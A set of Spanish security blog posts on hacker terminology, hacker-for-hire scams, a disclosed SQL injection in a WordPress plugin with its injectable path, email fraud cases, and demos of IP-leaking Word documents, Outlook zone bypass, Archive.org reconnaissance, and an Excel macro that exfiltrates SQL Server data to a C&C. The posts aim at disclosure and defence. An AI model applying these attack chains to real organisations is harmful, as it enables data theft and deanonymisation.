Un informático en el lado del mal

Cuando oí que la Real Academia de la Lengua Española iba a incorporar el término de hacker en el diccionario me temí lo peor. Había ido en el pasado a consultar la definición del mismo en el Diccionario Panhispánico de Dudas y allí ya lo definía como "pirata informático". Las probabilidades de que lo cambiaran a la hora de incorporarlo al diccionario oficial de la RAE eran pocas, como al final sucedió. Y me apené.

Figura 1: La RAE vilipendia a los hackers

La criminalización del término hacker significa una condena social a un grupo de personas que gracias a su esfuerzo e investigación han conseguido llevar las tecnologías a niveles mucho más allá de los que sus propios creadores pensaron. Gracias a hackers se han conocido fallos en seguridad de sistemas que han sido corregidos sin que el investigador haya recibido más que un simple gracias, a veces incluso menos. Gracias a los hackers se ha podido transformar la manera en la que nos comunicamos y vivimos hoy en día por Internet.

Figura 2: Definición de hacker usada en la RAE

El definir a un hacker como un pirata informático, iguala el trabajo de un investigador que es capaz de encontrar un bug en el protocolo tan importante para nuestra sociedad como SSL con el de un cibercriminal que usa herramientas de terceros para engañar a sus víctimas y robarles. Iguala a un estafador por Internet que roba las cuentas con correos de phishing para lucrarse con el de una persona que es capaz de demostrar que los sistemas de seguridad de las aplicaciones que usamos todos los días no protegen correctamente la privacidad de usuarios.

Figura 3: Definición de pirata informático

Podrían haber elegido una definición más elaborada, con más explicaciones, con más matices si quieren sobre lo que significa ser un hacker, pero al final han igualado al que copia un software con copyright para venderlo en el mercado negro con aquel que dedica horas y horas a mejorar la seguridad de un software o una plataforma.

Hackers, Cibercriminarles o Hacktivistas catalogados de la misma forma, y por tanto igualados en la misma condición, como Piratas Informáticos, cuando ni tan siquiera comparten ideas. Tan indignado me he quedado que he abierto una petición en Change.org para recoger firmas y que la RAE cambie la definición del término hacker en el diccionario.

Figura 4: Petición en Change.org

En el texto de la petición pone:

"Desde hace tiempo los hackers han sido investigadores que han ayudado al progreso de la sociedad tecnológica de nuestro tiempo. El utilizar la definición como "pirata informático" para la palabra hacker es una criminalización del término y una degradación a ciberdelincuente de un grupo de personas que gracias a su pasión por buscar los límites de las tecnologías han mejorado nuestro tiempo."

Un hacker no tiene que estar solamente acotado en el mundo de la tecnología, pero aceptando esa limitación en el concepto, yo me aventuraría con toda humildad a pedir que utilizaran alguna definición más elaborada. Alguna propuestas que le dejaría a la RAE:

-Hacker: Investigador/a que con pasión y habilidad es capaz de hacer cosas con las tecnologías más allá de las que los propios creadores pensaron. Que busca los límites a la tecnología con el fin de mejorarla.

No soy un experto en definiciones, pero tengo claro que los hackers que yo he conocido no encajan para nada en el perfil de pirata informático, y que los que encajan con esa definición están tan lejos de los hackers que es una ofensa haberlos catalogado de esa forma. Han mancillado el término hacker y me apena que haya sido de forma oficial.

Señor Arturo Pérez-Reverte, como declarado lector adicto de su obra que soy, y como gran tuitero que es usted, desde su sillón "T" de la Real Academia de la Lengua, le pido que nos ayude a cambiar esto. La seguridad de su cuenta Twitter ha estado siempre en manos de hackers, como Moxie Marlinkspike o Charlie Miller, reconocidos hackers y miembros del equipo de seguridad de Twitter.

Figura 5: Arturo Pérez-Reverte es titular del sillón "T" en la Real Academia de Lengua y reconocido "tuitero"

Por favor, señores de la Real Academia de la Lengua, no vilipendien ni degraden a piratas informáticos a un grupo de personas maravillosas que están mejorando la sociedad y las tecnologías que ustedes mismos utilizan.

Saludos Malignos!

No hace falta que os recuerde el número de peticiones que me llegan - y me siguen llegando - para hackear a personas. Cuentas de Facebook, espiar el WhatsApp, robar las contraseñas de Gmail, etcétera, etcétera. Pero no solo eso, periódicamente llegan comentarios al blog que yo catalogo como spam y elimino de los artículos como el que podéis ver a continuación.

Figura 1: Campañas de spam ofreciendo "hackers for hire"

La mayoría son estafas que buscan engañar a la gente que intenta resolver sus problemas personales contratando a supuestos "hackers for hire" que utilizar contra su marido, ex-pareja, hijos, trabajadores, familiares, amigos o enemigos. De todo hay en la viña del señor, e incluso, como vimos en otra estafa, supuestos "hackers" ofreciéndose a cambiar las notas de la universidad.

Figura 2: El supuesto "hacker" que cambiaba notas de la universidad

Como en el ideario de muchos los "hackers son ciberdelincuentes", tal y como por desgracia ha recogido la RAE en su último boletín de actualización, muchos acaban llegando a personas que nada tienen que ver con este tipo de actividades. Seguro que muchos de vosotros también los recibís a menudo, ya que esto es como una plaga. Algunos me llegan por correo electrónico, otros llegan por el Facebook, y éste es el caso de esta chica.

Figura 3: Primer mensaje de contacto: "Te he estado escuchando por la radio"

En un primer mensaje me cuenta que había estado oyéndome en una intervención en la radio en la que yo hablaba de los riesgos de parear el terminal iPhone con un equipo compartido, o que no fuera nuestro, ya que se pueden robar o manipular los mensajes de WhatsApp o robar las cuentas de Facebook con un robo de cookies de iPhone, tal y como se ve en este vídeo que grabé.

Figura 4: Vídeo de cómo robar cuentas de Facebook de un iPhone pareado

Para explicarle que sí que era posible le envié el vídeo de la demostración en la que con un Bridging HTTPs(IPV4)-HTTP(IPv6) se roban unas credenciales de Facebook, ya que no había entendido que lo que realmente quería era que yo se las robase. La referencia al programa de radio me había descolocado un poco, pero una vez entendido que lo que ella buscaba era un "hacker for hire" yo pasé a explicarle que yo no hago cosas ilegales.

Figura 5: Busca "hackers for hire"

En mitad de la conversación, tras preguntarme si conocía a alguien que le ayudase con esa tarea, me informó de que ya la habían estafado anteriormente, algo que os va a pasar a muchos que sigáis paseando por la vereda oscura de Internet. Intrigado, le pregunté qué es lo que le había pasado.

Figura 6: Explicación de que ya la habían estafado

Y me contó su historia, donde supuestamente había un programa mágico que con poner el número de teléfono tenías acceso remoto y... no. No hay magia como ya hemos visto en otros casos

Figura 7: No solo la estafaron, sino que introdujo el número de teléfono

Al final no solo no consiguió nada, sino que fue estafada, perdido dinero y encima entregó información del número de teléfono al estafador que a partir de ese momento encima la puede tener extorsionada con contar a la víctima que esta persona está pagando por Internet para que le roben la identidad.

Figura 8: Fin de la historia.

Una vez más, como veis, los peligrosos y malos no son los hackers sino las personas cercanas que movidas por sentimientos humanos buscan robar la identidad y privacidad de sus víctimas. Algo de lo que tienes que protegerte sí o sí. Si no lo has hecho aún, pon un segundo factor de autenticación para proteger tus identidades, no vaya a ser que un día tengas un problema sin quererlo. Y a ti, si estás pensado en contratar algo así, te recuerdo el título de un artículo que publiqué hace tiempo: "Buscas criminales, NO hackers", y el que se mezcla en ese juego, acaba pringado.

Saludos Malignos!

Hacer unas semanas, un joven investigador de seguridad venezolano llamado KelvinSecurity se puso en contacto conmigo para contarme que se había topado con un bug de SQL Injection en un plugin para WordPress llamado Scarcity Builder, que se utiliza para generar contadores de marketing en sitios web creados sobre WordPress con el objetivo de que generen presión en los visitantes para forzar una acción. Cosas de la gente de marketing, ya sabéis.

Figura 1: Bug de SQL Injection en Scarcity Builder para WordPress

El caso es que el bug era un 0day porque incluso la web del propio fabricante era vulnerable a este fallo, así que decidimos ponernos en contacto con los desarrolladores y se abrió un ticket de soporte. La empresa que está detrás de él, llamada Digital KickStart, solucionó el fallo y respondió con una nueva actualización del mismo, tal y como podéis ver en la siguiente imagen.

Figura 2: Confirmación de que han solucionado el bug en la versión 2.2.10

Sin embargo, el bug, que es un SQL Injection de libro y que se encuentra fácilmente usando Havij o cualquier otro escanner de vulnerabilidades web, está aún por desgracia en muchas páginas web con WordPress, ya que la empresa no ha hecho un Security Advisory o similar.

Figura 3: Explotación del bug en un WordPress vulnerable con Havij

El SQL Injection se encuentra en concreto en:

wp-content/plugins/scarcitybuilder/shortcode/index.php?edit=

Por supuesto, con un SQL Injection como esté, se puede extraer toda la información de WordPress, incluidos, usuarios, contraseñas e información confidencial que se encuentre guardada en la base de datos o accesible desde ella en el servidor.

Figura 4: Extracción de información con el bug en el plugin Scarcity Builder

El plugin no es demasiado común - seguramente porque es un plugin de pago - y solo aparecen algo más de 800 sitios indexados en Google que lo tengan funcionando, pero el bug es tan fácil de localizar y explotar de forma automatizada que espero que hagan un aviso directo a los clientes haciéndoles entender el riesgo de no actualizar a esta versión.

Figura 5: Número de WordPress con este plugin instalado, localizados vía Google

Si tienes WordPress con este plugin, actualízalo ya. Si tienes clientes con WordPress, avísales de este riesgo de seguridad para que tomen medidas urgentes y, a ser posible, que tengan procedimientos y herramientas para actualizar automáticamente los plugins. No olvides que tienes herramientas como WPHardening para fortificar WordPress, y que tú además puedes puedes fortificar WordPress con configuraciones más seguras.

Saludos Malignos!

Durante el día de ayer me pidieron asesoramiento para un par de incidentes que me resultaron curiosos por el modus operandi de los estafadores. Casos en los que en lugar de buscar una forma burda y rápida de robar el dinero, eligieron una manera sigilosa y quirúrgica para hacerlo.

Figura 1: Dos casos reales de robo de dinero con suplantación de identidad

Os los cuento por aquí, para que veáis que esto no es películas y que te puede pasar a ti o a tu empresa también y cómo han aprovechado todos los detalles posibles para pertrechar sus ataques.

El caso de la transferencia bancaria de 19.000 € por e-mail

El primero de los casos es un ataque contra un individuo que cuenta con unos ahorros en su cuenta corriente. Esta persona lleva trabajando tiempo con la misma sucursal bancaria y por tanto ha llegado a un nivel de confianza tal como para mantener una correspondencia habitual por medio del correo electrónico pidiendo pequeños pagos, movimientos e información de su cuenta. La relación es fluida, y durarera en el tiempo, así que esas acciones se acaban llevando a cabo sin una confirmación robusta de todas y cada una de las órdenes que se realizan. De vez en cuando hablan por teléfono así que no hay problema en la confirmación.

De repente, durante el día de ayer, la persona recibió un aviso desde el proveedor de su cuenta de correo electrónico (Google) informándole de que se había producido una conexión a su identidad desde una dirección no habitual, que si era él no pasaba nada, pero que si no era él que la bloqueara y cambiara la contraseña. Por supuesto, tras verificar que el correo electrónico era original y no un caso de suplantación de identidad mediante una técnica de spoofing de e-mail para hacerle un ataque de phishing se preocupó e hizo lo que le pidieron. Al mismo tiempo recibió una llamada telefónica del banco.

La persona de la sucursal que habitualmente le realiza las acciones le había llamado por teléfono para confirmar si los 19.000 € que iba a transferir al extranjero tenían algún motivo concreto, ya que le parecía muy extraño que una orden de semejante cantidad se hiciera por correo electrónico. No hay ni que decir que él no había hecho la petición de la transferencia, pero la persona que lo había pedido lo había escrito desde su correo, imitando la forma de escribir suya. Como el banco por seguridad tenía la cuenta bloqueada para transferencias internacionales, el atacante había tenido primero que mantener una correspondencia para pedir que cambiaran esa restricción, para después pedir la orden de transferencia de los ahorros de la víctima a un país extranjero.

Evidentemente, la alerta en el último momento de la empleada de la sucursal, y el que pudiera hacerse con él por teléfono a tiempo para confirmar todo, pararon en última instancia el que se llevaran el dinero de su cuenta. El atacante había robado su cuenta de correo electrónico, había estado leyéndose los correos uno a uno y conociendo el entorno de su vida personal a través de su vida digital, para preparar el mejor ataque posible, y cuando lo encontró, lo hizo de manera bien pensada y aprovechando todas y cada una de las debilidades que pudo.

Le robo una cuenta de su correo personal al que se conectaba porque no tenía un segundo factor de autenticación asociado. Eso implica que o bien tenía el equipo infectado con algún troyano para robar identidad o que había realizado alguna conexión a una red de forma insegura. Después se aprovecho de que la persona había, conscientemente, rebajado los niveles de seguridad al utilizar el correo electrónico para comunicarse con su banco y solicitar acciones sobre sus cuentas.

El caso del cobro de los servicios que se paga a un tercero

El segundo de los incidentes del día de ayer no acaba tan bien. En este caso, una empresa A trabaja para otra empresa B. Dicha empresa B debe realizar los pagos para la empresa A en una fecha que denominaremos el día D. Pocos días antes del día D, uno de los responsables del proyecto de la empresa A se va de vacaciones unos días activando el famoso OoO (Out of Office) informando del hecho, pero como había dejado todas las gestiones realizadas, solo cabe esperar que el día D llegue el pago de la empresa B hacia las cuentas de la empresa A.

Llegado el día D, la empresa A constata que no ha recibido el pago de B, y tras regresar el responsable del proyecto de sus vacaciones contacta con la empresa B para reclamarlo. La empresa B, en ese momento responde que realizó el pago en tiempo y forma a la cuenta que le había dicho el responsable de la empresa, enviándoles además el justificante de transferencia.

Cuando revisan el justificante, se percatan de que la transferencia se ha hecho a una cuenta de otro país, que nada tiene que ver con ellos y les dicen que se han equivocado. Sin embargo, la empresa B les envía los correos electrónicos enviados por el responsable de A solicitando el pago del proyecto a esa cuenta, que por supuesto es de un atacante que se ha llevado el dinero.

No he tenido acceso a esos correos electrónicos, pero está claro que el atacante tiene controlada la empresa A o la empresa B. Si los correos electrónicos son un spoofing de las cabeceras de correo de la empresa A, entonces conocía el proyecto (ya fuera por una fuga de información de A o de B) y se la ha colado a la empresa B a la que ha engañado, por supuesto, en ese caso, el que la política SPF de la empresa A no fuera lo suficientemente robusta habría ayudado a esa suplantación, lo que le permitiría a la empresa B abrir un debate sobre si es responsable en algún término al no haber endurecido sus políticas anti-spoofing.

Si por el contrario, el correo ha salido de los servidores de correo electrónico de la empresa A, entonces parece claro que el engaño y robo se lo han hecho a la empresa A, pero por otro lado lo cierto es que nunca se realizó el pago de los servicios desde la empresa B a la empresa A, por lo que al fiarse de un medio como el correo electrónico para confirmar un cambio de cuenta de pago es también responsabilidad de la empresa B.

Lo que sí que está claro es que el atacante se ha llevado todo el dinero por conocer todos los detalles del proyecto, que el responsable estaba fuera de vacaciones y que el correo electrónico era el medio que estaban usando las dos empresas para comunicarse en detalles tan importantes. Quién se quedará sin el dinero está aún sin resolver.

Una reflexión final

Como podéis ver, los atacantes hacen ataques dirigidos mucho más elaborados, como los que muchos creen aún que solo son de película, sumando para ellos pequeñas debilidades de seguridad en los procesos de gestión de las identidades digitales personales y empresariales. Ten mucho cuidado y si quieres saber un poco más de estos casos, te recomiendo la lectura del libro de Fraude Online.

Saludos Malignos!

Las técnicas de Doxing se utilizan para desvelar identidades ocultas en la red. Saber quién está detrás de un perfil falso de Facebook, quién es el que maneja una cuenta de Twitter o el que está detrás de un correo electrónico. El objetivo de todas estas técnicas de doxing es poder averiguar nueva información de la persona detrás de la cuenta. Una nueva dirección IP, un número de teléfono o una versión de software pueden ayudar a avanzar en una investigación y por tanto son muy delicadas y codiciadas todas las nuevas técnicas que se conocen a este respecto.

Algunos ejemplos de doxing

Por ejemplo, la fugas de información por metadatos han ayudado a resolver muchos casos en el pasado, como el ejemplo de las notas de prensa de anonymous o el de la filtración del ERE del PSOE a lo medios.

Figura 1: En el cliente Mail de iOS se revelaba la dirección IP, y en el USER-Agent la info del dispositivo

Pero no solo eso, por ejemplo los bugs de seguridad que permitían utilizar técnicas click to call en las apps de iOS dejaban a un atacante la posibilidad de conseguir la revelación del número de teléfono, o la carga insegura de imágenes en correos electrónicos, como vimos en el cliente iOS durante mucho tiempo, podría ser utilizado para localizar siempre a una persona.

Un ejemplo de doxing con un documento Microsoft Word

Para el último Security Innovation Day le dedicamos una pequeña parte de una de las charlas a esto, y en concreto a sacar a la dirección IP de una conexión forzando un callback home con un documento Microsoft Word especialmente creado para cargar una imagen remotamente - desde una máquina controlada - sin que le diera una alerta al usuario que abría el documento.

Figura 2: Un documento de Microsoft Word para hacer Doxing

Sin embargo, si el documento es abierto después de haber llegado por Internet, ya sea por el correo electrónico o descargado por medio de un navegador para conectarse a la web, entonces el documento al ser abierto muestra una alerta genérica de seguridad, tal y como puede ser visto.

Figura 3: Alerta de Seguridad en Microsoft Word por la seguridad de la zona

En nuestra demo, esta alerta salía porque para el ejemplo enviábamos el documento como adjunto de un correo electrónico que es enviado a la víctima, y tanto si haces doble clic sobre el fichero adjunto como si guardas el fichero con las opciones del menú contextual y lo abres después, la alerta indica que el documento viene de Internet y puede ser peligroso.

Figura 4: Zonas de seguridad en Outlook

Esto lo explica Sergio de los Santos (@ssantosv) en su libro de Máxima Seguridad en Windows cuando muestra que las Zonas de Seguridad de Internet Explorer también existen en Microsoft Outlook, como cliente de un servicio de Internet que es. Así, estas se pueden igualmente personalizar y configurar para decidir cuáles deben ser los controles a aplicar.

El drag & drop y el cambio de zona de seguridad

El asunto está en que, si el documento que viene como adjunto, en lugar de ser abierto haciendo doble clic o usando la acción de guardar de Microsoft Outlook, es extraído mediante un drag & drop, es decir, arrastrando el documento desde el adjunto del correo electrónico hasta, por ejemplo el escritorio, todo cambia.

Figura 5: El documento es arrastrado al escritorio desde el cliente de Microsoft Outlook

Con ese proceso se ha cambiado el documento de una Zona de Internet a un Zona Local, por lo que todas las opciones de seguridad también cambian y no sale ninguna de las alertas anteriores. Esto provoca que inmediatamente, nada más abrir el documento se comunique la dirección IP al servidor controlado por el atacante y se descubra la dirección IP original.

Figura 6: El documento se abre sin alertas de seguridad y reporta la dirección IP al servidor del atacante

El problema es que los usuarios, que siempre luchan contra las medidas de seguridad que ellos consideran "molestas", puedan haber tomado como costumbre esto para evitarse la alerta de seguridad que sale en el documento, y sin darse cuenta están quitando una medida de seguridad que no solo protege frente a doxing, sino que tiene medidas de seguridad que ayudan a evitar las infecciones de malware o dificultando el éxito de exploits. Si usas Microsoft Outlook, ten presente este funcionamiento para mantener tu sistema Microsoft Windows más seguro.

Saludos Malignos!

Una de las cosas que nosotros hacemos en nuestros sistema de Pentesting Persistente Faast es la búsqueda de todas las URLs históricas que ha habido en todos y cada uno de los sitios web de una organización. Para ello, una opción es irse a Archive.org y buscar todas las URLs pidiendo el listado completo de todas ellas, tal y como se explica en el artículo de Hacking con Archive.org.

Figura 1: El primer asterisco es para "cualquier fecha", el segundo es para "cualquier cadena a partir de aquí"

Una de las cosas que yo he estado mirando es cómo obtener de forma rápida, de una URL concreta, el número de copias distintas que tiene The Wayback Machine de ella. Es decir, saber ¿Cuántas copias puedo sacar históricas de una documento en Internet? Por ejemplo, si quiero saber la cantidad exacta de ficheros distintos de que hay disponibles de un fichero concreto que interese en una auditoría de seguridad.

Figura 2: ¿Cuántas copias únicas se pueden conseguir de un documento en Internet?

Localizar el número de copias únicas de un fichero en Archive.org

Si queremos saber el número de copias distintas que Archive.org tiene del fichero robots.txt en el dominio www.apple.com, podríamos pedir una URL concreta y ver la respuesta. En los resultados se aprecia que hay una buena cantidad de capturas de esa URL, pero si quiero saber el número de ellas que son únicas, entonces es más complicado, ya que en esa página de resultados no aparece. Sin embargo, si miramos los resultados de la Figura 1, podremos apreciar que The Way Machine, en el listado de los resultados sí que aparece el número de Copias Únicas, es decir, de copias de esa URL con información distinta, lo que me tendría que ayudar a saber exactamente el número de documentos diferentes.

Figura 3: Si pides la URL concreta no da la información de las copias únicas

Ese valor me permitiría saber cuántos son los documentos que necesito obtener para tener todo lo que se ha podido filtrar vía, por ejemplo, el fichero robots.txt de www. apple.com. Tened en cuenta que, vistos los ejemplos de ataques que se pueden hacer con un robots.txt que se explican en "No me Indexes que me cacheo", el contar con todas las copias de los ficheros robots.txt puede ayudar a localizar algún punto vulnerable de esa infraestructura.

Tras jugar con ello, he visto que resolver esto en Archive.org es sencillo, y no solo vale para resolver esta pregunta, sino para que de forma rápida permita localizar copias de los archivos cuando estos han sido filtrados. Para ello, en lugar de utilizar toda la URL en la petición, basta con pedir la URL con un asterisco en la extensión.

The Wayback Machine solo permite este comodín al final de la URL, por lo que se puede utilizar como extensión y localizar todas las copias de una misma URL pero que acaben de forma distinta, para sacar backups o indexación de la misma URL con distintos parámetros, lo que da bastante juego. Con esta información sería posible hacer un script que capturase ese valor de la Figura 4, y luego fuera recuperando archivos distintos en la primera hasta que se tenga los 28.367 archivos que hay que tener para estar seguros de tener todas las copias de esa URL disponibles en Archive.org.

Figura 4: Wayback Machine tiene 28.367 copias distintas de http://www.apple.com/robots.txt

Fugas de información por metadatos en documentos modificados

Por supuesto, esto también es perfecto para localizar las fugas de metadatos en copias de archivos ofimáticos que dan situaciones como las descritas en los casos de análisis forense de metadatos o simplemente para saber qué se modificó en documentos publicados en páginas webs. En este caso, con la mda.mil, es posible limitar la búsqueda a los documentos PDF del directorio de documentos y sacar el número de copias únicas de cada uno de ellos.

Figura 5: Copias únicas de documentos PDF de la mda

Como se puede ver, de los más de seiscientos que hay publicados, de algunos ha habido hasta 10 modificaciones a lo largo del tiempo, lo que más que probablemente dará más información al sumar el análisis de todos ellos que solo al analizar uno.

Saludos Malignos!

Hace unas semanas me topé con una historia divertida sobre privacidad en Facebook que me sacó una sonrisa. No era muy activo como usuario de Facebook y por eso maté mi cuenta personal, que convertí en mi página Facebook donde publico los posts de nuestros blogs y poco más. Por allí, uno de los lectores llamado Rubén me contactó y me preguntó si conocía el "bug" que permitía ver las fotos de la gente que no es amiga tuya.

Figura 1: ¿Cómo ver las fotos que en Facebook gente que no es amiga tuya?

Inicialmente pensé en el problema de indexación de Facebook con las fotografías en Google, pero resultó ser que no, así que me envió un ejemplo de "Cómo ver las fotografías de personas que no son tus amigas".

La descripción del "bug"

Como yo no lo conocía, Rubén me envió un paso a paso para que lo entendiera. Todo comienza con una búsqueda de un perfil cualquiera en Facebook, en este caso, el de alguien llamado Rafa.

Figura 2: Perfil de Rafa localizado buscándolo

Una vez que se está en ese perfil se va a ver las fotografías que tiene públicas, y como podéis ver no aparece prácticamente ninguna, con lo que no hay mucho que ver.

Figura 3: No hay fotos de Rafa

Para conseguir ver las fotos hay que irse a las Opciones de Configuración de la cuenta de Facebook y modificar el idioma a Inglés.

Figura 4: Configuración de cuenta

Para ello, en donde esté configurado nuestro idioma como Español, se pone Inglés de Estados Unidos y se da a guardar.

Figura 5: Configuración inicial de la cuenta

Figura 6: Cambio de idioma a Inglés

Una vez que el idioma ya se ha guardado correctamente, todas las opciones de la cuenta estarán en perfecto Inglés.

Figura 7: Cuenta ya configurada en Inglés de Estados Unidos

Ahora hay que ir atrás en la navegación para volver a la página de búsqueda, donde aparece el cuadro de dialogo de buscar.

Figura 8: Hay que volver atrás en la barra de navegación

Solo hace falta poner el cursor sobre él, y como recuerda la búsqueda anterior, saldrán las opciones de ver las fotos de Rafa, tanto las suyas como las que le gustaron, las que comentó, etcétera.

Figura 9: Cuadro de búsqueda. Hay que hacer clic en el cuadro de dialogo.

Figura 10: Opciones de búsqueda de fotos de Rafa

Y se podrá por supuesto visitar todas y cada una de ellas que nos vaya mostrando Facebook.

Figura 11: Fotos que le gustan a Rafa

La historia por detrás con su explicación

Como tengo conocidos en el equipo de seguridad de Facebook, le pregunté a Rubén si le importaba que se lo contase a ellos a ver qué explicación había y él me dijo que sí, así que hablé con mi contacto allí y tras leerse el paso a paso me dijo.

"Chema, no es nada, es solo que la función de Graph Search está solo en inglés, por eso solo le salen las fotos solo cuando el idioma está en inglés. Nada más."

En definitiva: No es un Bug, es un sistema de búsquedas que solo está disponible en inglés, pero respetando la privacidad de las configuraciones de las cuentas. Como podéis ver yo soy un noob usando Facebook. Se lo conté a Rubén, que también se quedó con la copla y todo resuelto. Lo mejor de todo es que yo no conocía este detalle, y desde esta historia me he dado cuenta de que merece la pena tener el idioma de Facebook en Inglés de Estados Unidos, pues gracias a Graph Search se puede sacar mucha más información de la que yo inicialmente pensaba, así que no es un "bug", pero sí una gran feature... solo en Inglés.

Saludos Malignos!

El título bien podría ser "descargarse ejecutables desde cualquier red puede ser peligroso", pues permitir a un programa que realice acciones en tu equipo no es buena idea si no confías mucho en su procedencia, pero cuando conoces su procedencia pero lo descargas desde una red que puede tener un esquema de Man in the middle - uno de los ataques de red más comunes - esto puede ser aún más peligroso aún. En el caso de la Deep Web, en concreto en la Red TOR, tanto los nodos de entrada como los nodos de salida mantienen un esquema de Man in the middle entre el cliente y el servidor, por lo que si uno de ellos se vuelve malicioso, podría ser muy peligroso.

Figura 1: Descargar ficheros desde un nodo TOR malicioso es peligroso

Cuando estuvimos haciendo el trabajo de Owning Bad Guys {and Mafia} Using JavaScript Botnets utilizamos un servidor Proxy anónimo como esquema de Man in the middle, pero también montamos un nodo TOR de salida malicioso que manipulaba las respuestas DNS. En aquel entonces nos detectaron las medidas de seguridad y os lo dejé escrito en el artículo "Protección contra DNS Hijacking en la Red TOR".

Figura 2: Conferencia de Owning bad guys {and mafia} using JavaScript Botnets en Black Hat USA 2012

Al final, cuando nos conectamos a cualquier red siempre tenemos esquemas de Man in the middle, que pueden volverse peligros ya sea mediante un Access Point en la red WiFi que nos pueda hacer un ataque de Web Proxy AutoDiscovery, un router que nos haga un ataque SLAAC o el mismo servidor VPN que estés utilizando e infectando todos los ficheros JavaScript que descarguemos. Es por ello que autenticar y cifrar extremo a extremo es lo más deseable para garantizar que te estás conectando al elemento que quieras y que nadie en medio va a poder acceder a los datos que van en la comunicación.

Si el cifrado extremo a extremo no funciona, alguien podría meterte en una JavaScript Botnet, acceder a tus datos, o manipular los ficheros que descargas. En Hack Players hablaron hace tiempo de BDFProxy, una herramienta que en tiempo real infecta todos los archivos que pasan por un esquema de Man in the middle, lo que haría que cualquiera de esos que acabe ejecutándose en el cliente de la víctima quede comprometido.

Figura 3: Ejemplo de funcionamiento de BDFProxy para infectar binarios

Efectivamente, el manipular estos ficheros para meter el backdoor acabaría por romper cualquier firma digital del fichero que sea comprobada a posteriori. Esto, en los sistemas de actualizaciones es comprobado desde hace tiempo - o al menos debería - ya que desde que el investigador argentino Francisco Amato (@famato) publicó las técnicas de Evil Grade, se sabe que un atacante podría estar actualizando el software de su sistema operativo y alguien, con un ataque de Man in the middle, en lugar de entregar una actualización legítima entregue un backdoor para controlar el paquete.

Figura 4: Fin fisher uso un bug de Evil Grade en iTunes para infectar Mac OS X durante años

Si esto sucede, el software de actualización no funciona, y sale un error de firma incorrecta del binario, que es lo que llevó al creador de BDFProxy a investigar los nodos de la red TOR en busca de alguno que estuviera alterando los binarios.... y acabó por encontrarlo. El nodo malicioso en concreto estaba en Rusia, y estaba infectado con bots para controlar equipos que se conectan a través de la red TOR y enviándolos a paneles de control en servidores de Internet. De hecho, uno de los binarios infectados apunta a una web del pueblo de Alcoy, donde se puede ver que en Google han quedado indexados unos enlaces "extraños" con parámetros codificados.

Figura 5: Enlaces a un posible panel de control en una de las webs que aparecen en el binario

El riegos de utilizar esquemas de Man in the middle es que al final hay que confiar en los dispositivos de red que están en medio - por eso la NSA intentaba controlarlos en sus operaciones de espionaje - y en algunas redes como CJDNS conseguir acceder a ella exige un proceso de ganarncia de confianza. Sea como fuere, si vas a bajarte un binario ejecutable, hazlo desde la conexión más confiable posible.

Saludos Malignos!

Cuando se trata de hacer un ataque a los servidores internos de una empresa siempre hay que buscar un punto de apoyo en el que apuntalar el ataque. Hace tiempo, antes de que Apple arreglara en iOS 6 las opciones de seguridad por defecto en la carga de las imágenes en los correos electrónicos que se visualizaban en el cliente iOS Mail, escribí un artículo sobre cómo aprovechar esto para hacer ataques de SQL Injection a la web de la empresa usando al jefe o hacer ataques de CSRF, y después salió alguna prueba de concepto que hacía algo similar con un CSRF usando passwords por defecto y debilidades en alertas de navegadores. Pequeñas debilidades que sumadas dan owned!.

Figura 1: Cómo robar la base de datos de la empresa usando a un empleado de la organización

En este caso, para el Security Innovation Day 2014 en Eleven Paths preparamos un ataque similar, pero usando un fichero Excel, una macro VBA (Visual Basic for Applications) y una cadena de conexión con autenticación del lado del servidor. Os lo explico.

Figura 2: Un panel de control para cocinar el ataque

La idea era demostrar como un atacante podría utilizar pequeñas debilidades en una empresa para conseguir robar una base de datos completa SQL Server sin ni tan siquiera hacer mucho ruido. Para ello, el primer paso es sencillo, un correo dirigido con una buena excusa, y adjuntar en él un fichero Excel.

Figura 3: El correo electrónico le llega a la víctima sin ningún aviso de seguridad

Si es un jefe, seguro que se te ocurren mil y una excusas para enviar un correo electrónico con un Excel adjunto. Así que usa tu imaginación en esta parte del proceso. Nosotros no le dimos demasiada importancia a esto, pero si encima el target tiene una configuración relajada del registro SPF podrás incluso suplantar a algún empleado interno de la empresa con facilidad.

Figura 4: El fichero se guarda en el equipo local con un Drag & Drop para evitar la alerta de zona de Internet

Una vez que el fichero adjunto se abra se mostrará una alerta indicando que hay algún contenido que ha sido deshabilitado, para conseguir engañar al usuario, de nuevo, puedes hacer uso de algún truco de ingeniería social. En este caso el truco es que se está cargando una imagen externa.

Figura 5: Falta una imagen porque no has aceptado la alerta de seguridad

Si el jefe activa el contenido, lo que realmente sucede es que se carga una macro VBA que realiza todo el trabajo. Para la demo hicimos una cadena de conexión con Autenticación Integrada, al igual que realizábamos en los ataques de Connection String Parameter Pollution. Para que el usuario se quede tranquilo, nosotros le mostramos la imagen como si fuera lo único que hubiera pasado en su equipo.

Figura 6: Ahora aparece la imagen en el fichero Excel

Como para la demo sabíamos el nombre del servidor SQL Server, la forma en la que se hace la cadena de conexión es muy sencilla, pero se podría haber realizado un escaneo de toda la red al estilo de Scanner CSPP que creamos, probando a conectarse a todo el rango de direcciones IP de la red.

Figura 7: La macro que se conecta al Servidor SQL Server con Autenticación Integrada, roba los datos y los manda al C&C

Cuando encuentre el servidor SQL Server y se pueda autenticar en él con las credenciales que la víctima haya utilizado para abrir su sistema operativo Windows, entonces se podría hacer un recorrido completo por el diccionario de datos y traer absolutamente todo. Para este ejemplo, tiramos una consulta contra una tabla de la base de datos y listo, eso sí, usando el For XML al estilo de los ataques de Serialized SQL Injection.

Figura 8: Datos reportados al C&C

El último paso es fácil, reportar todo a un panel de control en la web de la forma más silenciosa o sencilla. Para esta demo no quisimos complicarlo y se enviaba como parámetro GET de una petición, lo que permitía recoger la info que había en la base de datos.

Figura 9: Ningún AV de Virus Total muestra ninguna alerta de seguridad

Al final era un pequeño ejemplo de cómo la suma de pequeñas debilidades, como fugas de información de versiones utilizadas, nombres de personas de la organización, reglas relajadas en los filtros anti-spoofingSPF, políticas de seguridad de la aplicación Excel o el uso de Autenticación Integrada en SQL Server, podrían llevar a un atacante a tener éxito en el robo de datos de tu organización de forma sencilla.

Figura 10: Bosses Love Excel, Hackers Too!

Por supuesto, este fichero Excel cocinado a medida para este ejemplo no es detectado por ningún motor antimalware como algo malicioso o sospechoso. Solo es un Excel, y como dijimos Juan Garrido y yo en la charla de Defcon 19 donde explicábamos la cantidad de cosas que se pueden hacer con él, "Bosses love Excel, Hackers Too!".

Saludos Malignos!

